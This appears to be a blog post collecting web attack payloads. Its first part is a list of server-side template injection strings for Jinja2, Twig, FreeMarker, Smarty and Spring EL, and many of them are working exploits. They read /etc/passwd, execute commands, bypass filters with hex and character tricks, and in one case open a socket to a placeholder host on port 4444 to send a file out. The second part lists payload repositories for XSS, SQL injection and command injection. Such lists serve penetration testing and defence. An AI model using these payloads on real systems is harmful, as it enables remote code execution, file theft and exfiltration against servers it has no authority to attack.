
Recently used payloads

1、Server Side Template Injection Payloads (SSTI payloads)

The list below is taken from the payloadbox/ssti-payloads project. It mixes detection probes for several engines (Jinja2/Twig `{{ }}`, ERB `<%= %>`, FreeMarker and Spring EL `${ }`, Razor `@( )`, Pug/Java `#{ }`, Smarty `{ }`) with exploitation payloads; a probe only tells you something when the arithmetic is evaluated in the response (e.g. `{{7*7}}` rendering as 49), so test several syntaxes and compare against a baseline response. The Jinja2 payloads that index into `__subclasses__()` ([40], [396]) are tied to the interpreter and import state they were written against, and the `__mro__[2]` variants are Python 2 (`str` has the MRO `str, basestring, object` there; on Python 3 it is `__mro__[1]`).

{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}}
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
References:

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection

https://portswigger.net/research/server-side-template-injection

https://www.indusface.com/learning/application-security/server-side-template-injection/

Project:

https://github.com/payloadbox/ssti-payloads

The project contains many other payloads beyond the ones listed here; browse the repository for the rest.

2、Git All The Payloads! A Collection Of Web Attack Payloads (web attack payloads on GitHub)

Project:

https://github.com/foospidy/payloads

The repository's get.sh script downloads and extracts the payload files from the sources credited below.

Payload Credits

fuzzdb - https://github.com/fuzzdb-project/fuzzdb

SecLists - https://github.com/danielmiessler/SecLists

xsuperbug - https://github.com/xsuperbug/payloads

NickSanzotta - https://github.com/NickSanzotta/BurpIntruder

7ioSecurity - https://github.com/7ioSecurity/XSS-Payloads

shadsidd - https://github.com/shadsidd

shikari1337 - https://www.shikari1337.com/list-of-xss-payloads-for-cross-site-scripting/

xmendez - https://github.com/xmendez/wfuzz

minimaxir - https://github.com/minimaxir/big-list-of-naughty-strings

xsscx - https://github.com/xsscx/Commodity-Injection-Signatures

TheRook - https://github.com/TheRook/subbrute

danielmiessler - https://github.com/danielmiessler/RobotsDisallowed

FireFart - https://github.com/FireFart/HashCollision-DOS-POC

HybrisDisaster - https://github.com/HybrisDisaster/aspHashDoS

swisskyrepo - https://github.com/swisskyrepo/PayloadsAllTheThings

1N3 - https://github.com/1N3/IntruderPayloads

cujanovic - https://github.com/cujanovic/Open-Redirect-Payloads

cujanovic - https://github.com/cujanovic/Content-Bruteforcing-Wordlist

cujanovic - https://github.com/cujanovic/subdomain-bruteforce-list

cujanovic - https://github.com/cujanovic/CRLF-Injection-Payloads

cujanovic - https://github.com/cujanovic/Virtual-host-wordlist

cujanovic - https://github.com/cujanovic/dirsearch-wordlist

lavalamp- - https://github.com/lavalamp-/password-lists

arnaudsoullie - https://github.com/arnaudsoullie/ics-default-passwords

scadastrangelove - https://github.com/scadastrangelove/SCADAPASS

jeanphorn - https://github.com/jeanphorn/wordlist

j3ers3 - https://github.com/j3ers3/PassList

nyxxxie - https://github.com/nyxxxie/awesome-default-passwords

foospidy - https://github.com/foospidy/web-cve-tests

OWASP

dirbuster - https://www.owasp.org/index.php/DirBuster

fuzzing_code_database - https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database

JBroFuzz - https://www.owasp.org/index.php/JBroFuzz

Other

xss/ismailtasdelen.txt - https://github.com/ismailtasdelen/xss-payload-list

xss/jsf__k.txt - http://www.jsfuck.com/

xss/kirankarnad.txt - https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

xss/packetstorm.txt - https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

xss/smeegessec.com.txt - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

xss/d3adend.org.txt - http://d3adend.org/xss/ghettoBypass

xss/soaj1664ashar.txt - http://pastebin.com/u6FY1xDA

xss/billsempf.txt - https://www.sempf.net/post/Six-hundred-and-sixty-six-XSS-vectors-suitable-for-attacking-an-API.aspx (http://pastebin.com/48WdZR6L)

xss/787373.txt - https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/--xss.html

xss/bhandarkar.txt - http://hackingforsecurity.blogspot.com/2013/11/xss-cheat-sheet-huge-list.html

xss/xssdb.txt - http://xssdb.net/xssdb.txt

xss/0xsobky.txt - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

xss/secgeek.txt - https://www.secgeek.net/solutions-for-xss-waf-challenge/

xss/reddit_xss_get.txt - All XSS GET requests from https://www.reddit.com/r/xss (as of 3/30/2016)

xss/rafaybaloch.txt - http://www.rafayhackingarticles.net/2016/09/breaking-great-wall-of-web-xss-waf.html

xss/alternume0.txt - https://www.openbugbounty.org/reports/722726/

xss/XssPayloads - https://twitter.com/XssPayloads

sqli/camoufl4g3.txt - https://github.com/camoufl4g3/SQLi-payload-Fuzz3R/blob/master/payloads.txt

sqli/c0rni3sm.txt - http://c0rni3sm.blogspot.in/2016/02/a-quite-rare-mssql-injection.html

sqli/sqlifuzzer.txt - https://github.com/ContactLeft/sqlifuzzer/tree/master/payloads

sqli/harisec.txt - https://hackerone.com/reports/297478

sqli/jstnkndy.txt - https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/

sqli/d0znpp.txt - https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f

sqli/libinjection-bypasses.txt - https://gist.github.com/migolovanov/432fe28c8c7e9fa675ab3903c5eda77f

traversal/dotdotpwn.txt - https://github.com/wireghoul/dotdotpwn

codeinjection/fede.txt - https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/

commandinjection/ismailtasdelen-unix.txt - https://github.com/ismailtasdelen/command-injection-payload-list

commandinjection/ismailtasdelen-windows.txt - https://github.com/ismailtasdelen/command-injection-payload-list

CTF

Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

maccdc2010.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2011.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2012.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

ists12_2015.txt - Information Security Talent Search (http://ists.sparsa.org/), source: http://www.netresec.com/?page=ISTS

defcon20.txt - DEFCON Capture the Flag (https://www.defcon.org/html/links/dc-ctf.html), source: http://www.netresec.com/?page=PcapFiles


Miscellaneous

XSS references that may overlap with sources already included above:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://htmlpurifier.org/live/smoketests/xssAttacks.php
